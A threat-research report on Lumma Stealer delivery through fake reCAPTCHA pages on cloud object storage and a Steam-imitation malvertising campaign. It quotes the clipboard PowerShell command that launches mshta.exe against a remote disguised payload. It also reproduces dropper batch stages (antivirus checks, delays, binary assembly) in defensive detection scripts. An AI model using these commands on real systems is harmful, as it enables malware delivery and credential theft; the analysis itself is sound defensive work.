Cato CTRL™ Threat Research: Suspected Russian Threat Actors Leverage Tigris, Oracle Cloud Infrastructure, and Scaleway to Target Privileged Users with Lumma Stealer

Executive Summary
Imagine walking into a trusted bank, only to be handed counterfeit money by employees who don’t realize it’s fake. This is similar to a growing trend that’s emerging in the threat landscape. Threat actors are leveraging trusted cloud infrastructure platforms to host fake reCAPTCHA pages designed to deceive unsuspecting victims into executing malicious commands through the Windows Run dialog—specifically targeting high-access users within organizations to escalate privileges.
Our investigation has revealed a shift in the delivery methods of Lumma Stealer (also known as LummaC2 Stealer), a malware-as-a-service (MaaS) infostealer that targets Windows systems to exfiltrate credentials, system data, and crypto wallets. In February 2025, we observed threat actors leveraging Tigris Object Storage to host malicious content through fake reCAPTCHA pages, suggesting a focus on technically proficient users within organizations. The use of a developer-friendly and trusted platform like Tigris may have contributed to the activity initially evading detection. By March 2025, we observed similar tactics involving Oracle Cloud Infrastructure (OCI) Object Storage. By May 2025, these tactics had extended to Scaleway Object Storage. In all three cases, we found code-level evidence linking the activity to suspected Russian threat actors.
Below is a breakdown of the evolving techniques of two Lumma Stealer campaigns targeting organizations, starting with this year's activity abusing Tigris Object Storage, OCI Object Storage, and Scaleway Object Storage against privileged users, and tracing back to last year's efforts against gamers through fake software downloads imitating the Steam platform.
The choice to target privileged users at organizations is particularly concerning, as it may enable lateral movement within enterprise environments, increasing the risk of deeper compromise beyond the initial infection.
As part of our investigation into Lumma Stealer through the Cato MDR service, we proactively block fake reCAPTCHA redirection attempts using a high-confidence Cato IPS rule, mitigating the threat before user interaction. All Cato Networks customers are protected from Lumma Stealer.
We reached out to Tigris, Oracle, and Scaleway with our findings:
- Tigris acknowledged receipt, confirming that the sample we reported is no longer accessible on their platform. Additionally, Tigris has published a summary of how it combats platform abuse.
- Oracle has not responded as of the time of publication.
- Scaleway acknowledged receipt, confirming that they have taken the necessary steps to remove the fake reCAPTCHA pages on their platform.
We remain committed to working with cloud service providers to reduce the likelihood of their platforms being leveraged for malicious purposes.
Technical Summary
Lumma Stealer Campaign #1: Targeting Privileged Users via Tigris, OCI, and Scaleway Using LoLBins Techniques
Summary of Key Findings
Attack Vector: Fake reCAPTCHA pages on Tigris Object Storage, OCI Object Storage, and Scaleway Object Storage
Method: Users tricked into running clipboard-injected PowerShell via Windows + R
Execution: PowerShell launches mshta.exe to fetch disguised trojan (sports[.]mp4)
Techniques Used (MITRE ATT&CK):
- T1583.006: Acquire Infrastructure – Web Services
- T1204.004: User Execution – Malicious Copy and Paste
- T1059.001: Command and Scripting Interpreter: PowerShell
- T1218.005: Signed Binary Proxy Execution (mshta.exe)
- T1036.008: Masquerading: Masquerade File Type
Payload: Lumma Stealer
Evidence: VirusTotal and URLScan detections (Figures 2–12)
In-Depth Analysis and Insights
In February 2025, we observed attacks targeting organizations, where victims were redirected to Tigris Object Storage (a globally caching, S3-compatible object storage service) hosting fake human verification pages. These pages instructed users to press Windows + R to open the Run dialog and unknowingly execute a malicious PowerShell command copied to their clipboard, as shown in Figure 1.
Figure 1. Fake reCAPTCHA page hosted on Tigris Object Storage
We identified a slightly obfuscated PowerShell command (example below) that silently invokes mshta.exe, a legitimate Windows binary commonly leveraged by threat actors. In this case, the script attempts to execute content from a remote URL, amacys[.]shop/sports1[.]mp4, which is disguised as a benign video file.
Example: Malicious PowerShell Command Delivered via Clipboard
"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe" -w 1 -C "$l='hxxps[://]amacys[.]shop/sports[.]mp4';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ✅ ''I am not a robot: CAPTCHA Verification UID: 7811'”
We analyzed this file and found it is detected as a trojan on VirusTotal. Figure 2 shows the corresponding VirusTotal scan results for sports[.]mp4; a similar sample video file deflowev1.mp4 (Figure 3) was found to be associated with malware as well. Notably, these campaigns were mostly observed using suspicious top-level domains (TLDs) such as .shop, .site, and others, along with deceptive file extensions to disguise malicious payloads as harmless media files.
Figure 2. VirusTotal detection of sports.mp4 hosted on amacys[.]shop, identified as a trojan masquerading as a video file
Figure 3. VirusTotal detection of deflowev1.mp4 hosted on domains with [.]shop TLD, detected as Lumma Stealer
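The clipboard-delivered command above leaves a distinctive footprint in process-creation telemetry: a hidden PowerShell window launched from the Run dialog (so its parent is explorer.exe), Invoke-CimMethod used to spawn a child process, the mshta token split across string literals, a remote URL ending in a media extension, and a trailing "I am not a robot" comment. The following triage script is an added example written for this post, not Cato's detection logic or IPS rule; the Sysmon-style events and the host name lure.example are constructed placeholders, not indicators from the campaign.

```python
"""Triage process-creation events for the clipboard-to-Run-dialog pattern above:
a hidden PowerShell under explorer.exe that uses Invoke-CimMethod to spawn mshta.exe
against a URL disguised as a media file. Added example; not the vendor's detection."""
import re

# Constructed Sysmon-style (Event ID 1) records; lure.example is a placeholder host.
LURE_CMD = (
    '"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe" -w 1 -C '
    "\"$l='https://lure.example/sports.mp4';"
    "Invoke-CimMethod -ClassName Win32_Process -MethodName Create "
    "-Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}\" "
    "# I am not a robot: CAPTCHA Verification UID: 7811"
)
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",            # Run dialog spawns under explorer
     "CommandLine": LURE_CMD},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",   # scheduled-task style admin script
     "CommandLine": 'powershell.exe -NoProfile -Command "Get-Process | Out-File C:\\temp\\procs.txt"'},
    {"Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Windows\\System32\\msiexec.exe",   # local HTA run by an installer
     "CommandLine": 'mshta.exe "C:\\Program Files\\Vendor\\setup.hta"'},
]


def normalize_command_line(cmd: str) -> str:
    """Undo the cheap obfuscation seen in the samples: backtick escapes,
    'ms' + 'hta' style concatenation and mixed case."""
    cmd = cmd.replace("`", "")
    cmd = re.sub(r"""['"]\s*\+\s*['"]""", "", cmd)   # 'ms' + 'hta' -> 'mshta'
    return cmd.lower()


# Each regex runs against the normalized (lowercase, de-concatenated) command line.
INDICATORS = {
    # -w 1 is -WindowStyle Hidden (enum value 1)
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b"),
    "cim_process_create": re.compile(r"invoke-(?:cim|wmi)method.*win32_process.*create"),
    "mshta": re.compile(r"\bmshta(?:\.exe)?\b"),
    "media_url": re.compile(r"https?://\S+?\.(?:mp4|mp3|wav|jpg|jpeg|png|gif|avi)(?=['\"\s;)]|$)"),
    "captcha_lure_comment": re.compile(r"#.*(?:not a robot|captcha|verification)"),
}


def extract_indicators(event: dict) -> list:
    """Return the names of every indicator present in one process-creation event."""
    norm = normalize_command_line(event.get("CommandLine", ""))
    hits = [name for name, rx in INDICATORS.items() if rx.search(norm)]
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    # A hidden PowerShell whose parent is explorer.exe is what Win+R plus Ctrl+V looks like.
    if image.endswith("powershell.exe") and parent.endswith("explorer.exe") and "hidden_window" in hits:
        hits.append("hidden_powershell_from_explorer")
    return hits


def is_suspicious(indicators: list) -> bool:
    """Proxying a remote 'media' file through mshta is the core signal; otherwise
    require several weaker indicators together so admin scripts do not trip it."""
    core = "mshta" in indicators and ("media_url" in indicators or "cim_process_create" in indicators)
    return core or len(indicators) >= 3


def triage(events: list) -> list:
    """Score every event; returns one result dict per input event, in order."""
    results = []
    for ev in events:
        ind = extract_indicators(ev)
        results.append({"command": ev.get("CommandLine", ""),
                        "indicators": ind, "suspicious": is_suspicious(ind)})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print("SUSPICIOUS" if r["suspicious"] else "ok        ", r["indicators"])
```

Folding the concatenated literals before matching is what makes the rule hold up against the 'ms' + 'hta' split; the explorer.exe parent check separates Run-dialog launches from scheduled tasks and installers that legitimately start PowerShell or mshta.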
Tigris Object Storage Leveraged for Hosting Fake reCAPTCHA Pages
In February 2025, we found that Tigris Object Storage has been leveraged by threat actors to host fake reCAPTCHA pages. Figure 4 presents multiple VirusTotal detections confirming this malicious activity, while Figure 5 shows URLScan hits for fake reCAPTCHA content hosted on Tigris Object Storage.
Figure 4. VirusTotal detections of fake reCAPTCHA pages hosted on Tigris Object Storage
Figure 5. URLScan hits for fake reCAPTCHA hosted on Tigris Object Storage
Silent Execution of mshta.exe: A Common LOLBins Tactic with Russian-Language Comments Identified
We analyzed multiple Document Object Model (DOM) samples, which represent the structure and content of loaded web pages, and identified embedded PowerShell commands invoking mshta.exe, a legitimate Windows utility often exploited by threat actors to execute remote or embedded malicious scripts. This technique is commonly used in Living Off the Land Binaries (LOLBins) attacks to evade detection. Figures 6, 7, and 8 illustrate this behavior across various samples.
We also found comments written in Russian within several of the samples, as shown in Figure 7. When translating these comments, we see phrases like “Garbage HTML code,” “Main container,” “Additional garbage block,” “Additional garbage content to distract from the main code,” “Obfuscated code with garbage decoy functions,” “Decoy function (never called),” “Main click handler,” and “Additional garbage: random variables and unused functions.” These annotations appear consistently in Russian across the sample code and may suggest a possible connection to Russian threat actors. While this is not definitive evidence of attribution, it could indicate that the code was developed or maintained by Russian-speaking individuals. The use of such labels also points to a deliberate attempt to mislead security analysts and slow down manual investigation, while helping the attackers maintain a more structured workflow that makes the code easier to debug, update, and collaborate on.
Figure 6. DOM sample associated with domain: fly[.]storage[.]tigris[.]dev
Figure 7. DOM sample associated with domain: zuroxflweb[.]fly[.]storage[.]tigris[.]dev
Figure 8. DOM sample associated with domain: fly[.]storage[.]tigris[.]dev
OCI Object Storage Leveraged for Hosting Fake reCAPTCHA Pages
In March 2025, we found that OCI Object Storage (a storage platform), accessed via objectstorage.<region>.oraclecloud.com, has been leveraged by threat actors to host fake reCAPTCHA pages. Threat actors are bypassing security controls by embedding malicious content within legitimate cloud infrastructure.
Figure 9 shows URLScan detections of these fake reCAPTCHA pages, with additional hits highlighted in Figure 10. Figure 11 shows an example of the page code with comments written in Russian.
Figure 9. URLScan detections of fake reCAPTCHA pages hosted on OCI Object Storage
Figure 10. Additional URLScan hits showing malicious reCAPTCHA pages on OCI Object Storage
Figure 11. DOM sample associated with URL: objectstorage[.]ap-seoul-1[.]oraclecloud.com/n/id0cu93izlqm/b/need-to-complete-this/o/dest.html
Scaleway Object Storage Leveraged for Hosting Fake reCAPTCHA pages
In May 2025, we found that Scaleway Object Storage (an S3-compatible storage service), accessed via scw.cloud, has been leveraged by threat actors to host fake reCAPTCHA pages. Figure 12 shows URLScan hits for these pages.
Several of the observed samples contain recurring Russian-language comments (Figure 13).
Figure 12. Additional URLScan hits showing malicious reCAPTCHA pages on Scaleway Object Storage
Figure 13. DOM sample associated with URL: datastream-dist[.]s3[.]pl-waw[.]scw[.]cloud/pass-this-for-access-prism[.]HTML
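The DOM samples from Tigris, OCI, and Scaleway share the same page-level traits: a script that writes to the clipboard, visible instructions to press Windows + R, the PowerShell/mshta command embedded (sometimes concatenated) in the page, and Cyrillic comments around decoy code. The scanner below is an added example for this post, not Cato's detection or any project's code; it runs over a constructed, stripped-down fixture whose host name, placeholder URL, and Russian comments (my own renderings of the translated phrases listed above) are invented for the test and are not indicators from the campaign.

```python
"""Scan fetched page content for the fake reCAPTCHA (clipboard lure) traits described
above and note whether it sits on one of the abused object-storage hostnames.
Added example; the fixtures are constructed, not captured samples."""
import re
from urllib.parse import urlparse

# Constructed fixture: only the traits the write-up reports, with placeholder values.
SAMPLE_URL = "https://bucket-placeholder.s3.pl-waw.scw.cloud/pass-this-for-access.HTML"
SAMPLE_HTML = """<!doctype html>
<!-- Мусорный HTML-код -->
<div id="box">I am not a robot. Press Windows + R, then Ctrl + V and press Enter.</div>
<script>
  // Основной обработчик клика
  function onClick() {
    var c = 'powershell -w 1 -c "ms' + 'hta PLACEHOLDER_URL"';
    navigator.clipboard.writeText(c);
  }
  function decoy() { return 1; } // Функция-приманка (никогда не вызывается)
</script>
"""
BENIGN_HTML = """<html><body><h1>Storage browser</h1>
<script>document.getElementById('x').addEventListener('click', () => console.log('hi'));</script>
</body></html>"""

# Hostname shapes of the three object-storage services named in the post.
STORAGE_HOST_PATTERNS = [
    re.compile(r"(^|\.)storage\.tigris\.dev$"),
    re.compile(r"^objectstorage\.[a-z0-9-]+\.oraclecloud\.com$"),
    re.compile(r"(^|\.)scw\.cloud$"),
]
CHECKS = {
    "clipboard_write": re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]", re.I),
    "run_dialog_instruction": re.compile(r"\bwin(?:dows)?\s*(?:key)?\s*\+\s*r\b", re.I),
    "powershell_string": re.compile(r"\bpowershell(?:\.exe)?\b", re.I),
    "mshta_string": re.compile(r"\bmshta\b", re.I),
    "captcha_lure_text": re.compile(r"not a robot|verify you are human|captcha", re.I),
}
CYRILLIC = re.compile(r"[\u0400-\u04FF]")
# HTML comments, // line comments and /* */ blocks. Heuristic: a '//' inside a URL
# literal would also match, which only inflates the count, never hides a hit.
COMMENTS = re.compile(r"<!--.*?-->|//[^\n]*|/\*.*?\*/", re.S)


def fold_concatenation(text: str) -> str:
    """Join 'ms' + 'hta' style literals so split keywords still match."""
    return re.sub(r"""['"]\s*\+\s*['"]""", "", text)


def scan_page(url: str, html: str) -> dict:
    """Return the traits found, the count of Cyrillic-bearing comments and a verdict."""
    host = (urlparse(url).hostname or "").lower()
    folded = fold_concatenation(html)
    findings = [name for name, rx in CHECKS.items() if rx.search(folded)]
    if any(p.search(host) for p in STORAGE_HOST_PATTERNS):
        findings.append("hosted_on_object_storage")
    cyrillic_comments = sum(1 for c in COMMENTS.findall(html) if CYRILLIC.search(c))
    # Core of the lure: the text tells the user to open Run, the script fills the clipboard.
    lure = {"clipboard_write", "run_dialog_instruction"} <= set(findings)
    return {"host": host, "findings": findings,
            "cyrillic_comments": cyrillic_comments,
            "verdict": "clipboard_lure" if lure else "clean"}


if __name__ == "__main__":
    print(scan_page(SAMPLE_URL, SAMPLE_HTML))
    print(scan_page("https://docs.example/index.html", BENIGN_HTML))
```

The verdict deliberately rests on the two traits every variant must have (a clipboard write plus a Run-dialog instruction); the hosting pattern and the Cyrillic comment count are context for the analyst, since legitimate buckets and Russian-language sites share them.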
Lumma Stealer Campaign #2: Targeting Gaming Enthusiasts with Steam-Like Domain Using LoLBins Techniques
Summary of Key Findings
Attack Vector: Malvertising and brand impersonation
Techniques Used (MITRE ATT&CK):
- T1204.004: User Execution – Malicious Copy and Paste
- T1059.003: Command and Scripting Interpreter – Windows Command Shell
- T1059.010: Command and Scripting Interpreter – AutoHotKey & AutoIT
- T1574.001: Hijack Execution Flow – DLL Search Order Hijacking
- T1036: Masquerading (use of a Steam-like domain)
- T1036.001: Masquerading – Invalid Code Signature
- T1027.013: Obfuscated Files or Information – Encrypted/Encoded File
- T1518.001: Software Discovery – Security Software Discovery
Target Audience: Gaming enthusiasts
Malicious Domain: my-steamunlocked[.]online (mimicking Steam)
Payload Delivered: Lumma Stealer
Initial Access Method: Fake game downloads delivered through deceptive ads
In-Depth Analysis and Insights
In October 2024, we detected a Lumma Stealer distribution campaign that leveraged malvertising to compromise victims. Threat actors used malicious ads posing as legitimate software promotions, specifically targeting gaming enthusiasts. We observed that the attack chain redirected users from wq24-1[.]g-site[.]store to my-steamunlocked[.]online, a domain crafted to mimic the Steam platform. Unsuspecting users, believing they were downloading a free game, instead initiated the download of a Lumma Stealer payload, as shown in Figure 14.
Figure 14. Malware delivery disguised as a free game download
Upon clicking the link, the victim is instructed to copy a URL pointing to Mega, a legitimate cloud storage provider, in order to download a password-protected compressed file with an unusually long filename, as shown in Figure 15.
Figure 15. Redirection to my-steamunlocked[.]online imitating the Steam platform
We found that once extracted, the archive contains legitimate files, including Setup.exe (renamed from SenseCE.exe), alongside a modified DLL (MpGear.dll) crafted for DLL hijacking, as shown in Figure 16.
Figure 16. DLL hijacking via Microsoft-signed setup.exe using LOLBins
This technique was previously observed in a Lumma Stealer distribution campaign, as reported by ASEC.
Lumma Stealer’s Latest Variant Targets Gamers with Evolving Techniques
In March 2025, we found that the malicious domain (wq24-1[.]g-site[.]store) was still active, redirecting traffic to different domains and continuing to use the same method: instructing users to copy and paste a new Mega cloud storage link to download what appears to be cracked software. However, we recently discovered that the ZIP file now contains a different version of Lumma Stealer, employing a new technique. Figure 17 shows the contents of the password-protected compressed file.
Figure 17. Files inside the password-protected compressed file
When we executed SETUP.exe (as shown in Figure 18), it immediately spawned a command line process that ran an obfuscated batch script located in the %temp% folder (Figure 19). We then analyzed and deobfuscated the script, as shown in Figure 20.
Figure 18. SETUP.exe execution
Figure 19. Obfuscated batch script
Figure 20. Deobfuscated batch script
Breakdown of the process names the script checks for, and the security products they belong to:
- SophosHealth = Sophos
- bdservicehost = Bitdefender
- AvastUI = Avast
- AVGUI = AVG
- nsWscSvc = Norton Security
- ekrn = ESET
Batch Script Analysis
Security Check & Execution Delay
We observed that the script performs a security scan using tasklist.exe and findstr.exe (Figure 21) to detect known antivirus tools such as Sophos, Bitdefender, Avast, AVG, Norton Security, and ESET. When one of these is found, the script delays execution using the command ping -n 189 127.0.0.1 or choice /d y /t 300, likely in an attempt to evade or outlast the AV tools.
Figure 21. Processes cmd tasklist.exe, findstr.exe, and conhot.exe triggered by the script
Payload Assembly
We found that the script constructs a .com file by echoing the standard “MZ” header and combining multiple components (e.g., Readings, Legends) into Properly.com using binary mode (/b). This results in an AutoIt3-based executable. While AutoIt3.exe is legitimate, we’ve observed it being leveraged to obfuscate malware, act as a loader, and blend in with trusted system processes—consistent with living off the land (LOTL) techniques.
Script Construction via Embedded WAV Files
We observed the script combining multiple .wav files using copy /b to create a new file, n.a3x. These .wav files contain embedded binary data which, when merged, form a compiled AutoIt script. This technique is shown in Figure 22.
Figure 22. Dropped files in %TEMP% folder
Execution
Finally, the newly assembled .com file (AutoIT3.exe) is executed along with the n.a3x payload, followed by the choice /d y /t 300 command to introduce a 300-second delay.
We found that the script’s ultimate goal is to infect the device by executing a heavily obfuscated n.a3x AutoIT script containing the Lumma Stealer payload (Figure 23). We analyzed the script and observed that it spans thousands of lines, designed to obstruct analysis and hide its true intent. It decodes the embedded Lumma Stealer binary in memory and executes it. Once the system is infected, the malware reaches out to its command-and-control (C2) server to begin data exfiltration as configured.
Figure 23. Encoded Lumma Stealer binary data
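The batch stages described above (security software discovery via tasklist and findstr, ping and choice delays, echoing an MZ header and concatenating fragments with copy /b into a .com file, assembling n.a3x from .wav parts, then executing it) can be recognised mechanically once the script is deobfuscated. The analyzer below is an added example for this post, not Cato's tooling; it runs over a constructed batch fragment that mirrors the stages as described, with the file names taken from the write-up as placeholders and no real fragments behind them. The stage-to-technique mapping uses only the ATT&CK IDs listed in this post; the delay stage is left unmapped.

```python
"""Stage classifier for a deobfuscated dropper batch script, following the
behaviour described above. Added example over a constructed fragment."""
import re

# Constructed fixture modelled on the described stages; names are placeholders.
SAMPLE_BATCH = r"""
@echo off
tasklist | findstr /i "SophosHealth" && ping -n 189 127.0.0.1 >nul
tasklist | findstr /i "bdservicehost AvastUI AVGUI nsWscSvc ekrn" && choice /d y /t 300 >nul
echo MZ > Properly.com
copy /b Properly.com + Readings + Legends Properly.com >nul
copy /b 1.wav + 2.wav + 3.wav n.a3x >nul
Properly.com n.a3x
choice /d y /t 300 >nul
"""

# Process-name to vendor mapping from the breakdown above.
AV_PROCESS_NAMES = {
    "sophoshealth": "Sophos", "bdservicehost": "Bitdefender", "avastui": "Avast",
    "avgui": "AVG", "nswscsvc": "Norton Security", "ekrn": "ESET",
}

FINDSTR_TARGETS = re.compile(r'\bfindstr\b[^"]*"([^"]+)"', re.I)
PING_DELAY = re.compile(r"\bping\b\s+-n\s+(\d+)\s+127\.0\.0\.1", re.I)
CHOICE_DELAY = re.compile(r"\bchoice\b.*?/t\s+(\d+)", re.I)
ECHO_MZ = re.compile(r"\becho\s+MZ\s*>\s*(\S+)", re.I)
COPY_BINARY = re.compile(r"\bcopy\s+/b\s+(.+)\s+(\S+)$", re.I)
AUTOIT_RUN = re.compile(r"^(\S+\.(?:com|exe))\s+(\S+\.a3x)\b", re.I)


def classify_line(line: str) -> list:
    """Return every stage recognised on one (redirection-stripped) script line."""
    found = []
    m = FINDSTR_TARGETS.search(line)
    if m and re.search(r"\btasklist\b", line, re.I):
        vendors = sorted({AV_PROCESS_NAMES[t.lower()] for t in m.group(1).split()
                          if t.lower() in AV_PROCESS_NAMES})
        found.append({"stage": "security_software_discovery", "technique": "T1518.001", "detail": vendors})
    m = PING_DELAY.search(line)
    if m:  # ping waits about one second between echo requests, so -n N sleeps roughly N-1 s
        found.append({"stage": "execution_delay", "technique": None, "detail": int(m.group(1)) - 1})
    m = CHOICE_DELAY.search(line)
    if m:  # choice /t T times out after T seconds
        found.append({"stage": "execution_delay", "technique": None, "detail": int(m.group(1))})
    m = ECHO_MZ.search(line)
    if m:
        found.append({"stage": "pe_header_stub", "technique": "T1027.013", "detail": m.group(1)})
    m = COPY_BINARY.search(line)
    if m:
        parts = [p.strip() for p in m.group(1).split("+")]
        found.append({"stage": "payload_assembly", "technique": "T1027.013",
                      "detail": {"from": parts, "to": m.group(2)}})
    m = AUTOIT_RUN.match(line)
    if m:
        found.append({"stage": "autoit_execution", "technique": "T1059.010",
                      "detail": [m.group(1), m.group(2)]})
    return found


def analyze_batch(text: str) -> dict:
    """Walk the script and aggregate vendors checked, total sleep, and files assembled."""
    report = {"findings": [], "av_vendors_checked": set(), "delay_seconds": 0, "assembled_files": []}
    for raw in text.splitlines():
        line = re.sub(r"\s*>\s*nul\b", "", raw, flags=re.I).strip()   # drop >nul redirections
        if not line or line.startswith("@"):
            continue
        for f in classify_line(line):
            report["findings"].append(dict(f, line=line))
            if f["stage"] == "security_software_discovery":
                report["av_vendors_checked"].update(f["detail"])
            elif f["stage"] == "execution_delay":
                report["delay_seconds"] += f["detail"]
            elif f["stage"] == "payload_assembly" and f["detail"]["to"] not in report["assembled_files"]:
                report["assembled_files"].append(f["detail"]["to"])
    return report


if __name__ == "__main__":
    for f in analyze_batch(SAMPLE_BATCH)["findings"]:
        print(f["stage"], f["technique"], f["detail"])
```

The aggregate numbers are what an analyst wants first: which products the script looks for, how long it is prepared to sleep before acting (here roughly 13 minutes), and which files it stitches together, which tells the responder what to look for in %TEMP%.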
Conclusion
We have analyzed two Lumma Stealer campaigns targeting organizations: one delivered through malvertising and cracked software in 2024 mimicking Steam, and the other using fake reCAPTCHA pages hosted on Tigris Object Storage, OCI Object Storage, and Scaleway Object Storage in 2025. Through our analysis, we have observed a clear evolution in attacker techniques.
The recent campaign leveraging Tigris Object Storage, OCI Object Storage, and Scaleway Object Storage builds upon earlier methods, introducing new delivery mechanisms aimed at evading detection and targeting technically proficient users. Using Cato XDR and our story-based detection framework, we identified and blocked these threats early in the attack flow. As part of our investigation, we analyzed DOM samples from the fake reCAPTCHA pages and found threat actor comments written in Russian, including specific annotations embedded in the code. These findings highlight the technical depth and preparation behind the campaign.
We reached out to Tigris, Oracle, and Scaleway with our findings:
- Tigris acknowledged receipt, confirming that the sample we reported is no longer accessible on their platform. Additionally, Tigris has published a summary of how it combats platform abuse.
- Oracle has not responded as of the time of publication.
- Scaleway acknowledged receipt, confirming that they have taken the necessary steps to remove the fake reCAPTCHA pages on their platform.
We remain committed to working with cloud service providers to reduce the likelihood of their platforms being leveraged for malicious purposes.
As threat actors continue to evolve and leverage trusted infrastructure, continuous behavioral analysis and contextual detection remain critical to effective threat prevention.
Security Risks Introduced by the Evolved Delivery Tactics
- Targeting Privileged Users through Trusted Cloud Platforms: Threat actors host fake reCAPTCHA pages on platforms such as Tigris, OCI, and Scaleway. These attacks often count on technically proficient or privileged users being more likely to follow manual instructions, such as copying and executing system commands, especially when prompted by what appears to be a legitimate verification process.
- Leveraging Scaleway’s Low Visibility: Threat actors have also hosted fake reCAPTCHA content on Scaleway Object Storage, taking advantage of its lower security visibility and detection coverage compared to more widely monitored cloud infrastructure platforms. This allows malicious content to persist longer and evade traditional filtering mechanisms.
- Fake reCAPTCHA for Evasion: Manual user interaction bypasses automated detection, enabling stealthy malware execution.
Protections
As part of our investigation into Lumma Stealer through the Cato MDR service, we identified and blocked attempted redirections to fake reCAPTCHA pages. Using a high-confidence Cato IPS rule tailored to this technique, we proactively intercepted the threat before user interaction could occur, effectively mitigating it.
As Lumma Stealer delivery methods continue to evolve, alongside similar tactics used by other threat actors, we remain focused on adapting our detection capabilities. We actively track emerging threats, enhance prevention mechanisms, and automatically update our threat intelligence to block known malicious indicators.
Figure 24 shows an example of our detection of a disguised free game download, while Figure 25 highlights the detection of a fake reCAPTCHA page hosted in Tigris Object Storage.
Figure 24. Detection timeline of a disguised free game download
Figure 25. Detection timeline of a fake reCAPTCHA hosted in Tigris Object Storage
Indicators of Compromise (IoCs)
Malicious Domains & URLs
Malicious Files